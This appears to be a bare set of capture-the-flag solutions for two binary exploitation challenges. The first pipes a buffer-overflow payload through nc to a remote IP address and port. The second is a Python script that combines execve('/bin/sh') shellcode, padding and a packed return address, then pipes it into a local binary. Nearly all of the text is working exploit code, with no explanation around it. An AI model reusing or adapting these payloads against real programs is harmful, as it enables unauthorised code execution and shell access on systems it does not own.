
challenge: 1

(python -c 'print "A"*32 + "4\x12\x00\x00"' ; cat) | nc 13.233.99.37 1009

challenge: 2

# shellcode for 64 bit = "\x48\x31\xc9\xeb\x10\x5e\x48\x89\xf7\x56\x51\x48\x89\xe6\x48\x89\xca\xb0\x3b\x0f\x05\x48\xe8\xea\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"

import struct

payload = "\x48\x31\xc9\xeb\x10\x5e\x48\x89\xf7\x56\x51\x48\x89\xe6\x48\x89\xca\xb0\x3b\x0f\x05\x48\xe8\xea\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"

payload += "\n"


payload += "A"*40
payload += (struct.pack('<Q', 0x404070))

print payload


(python payload.py;cat) | ./chall_1
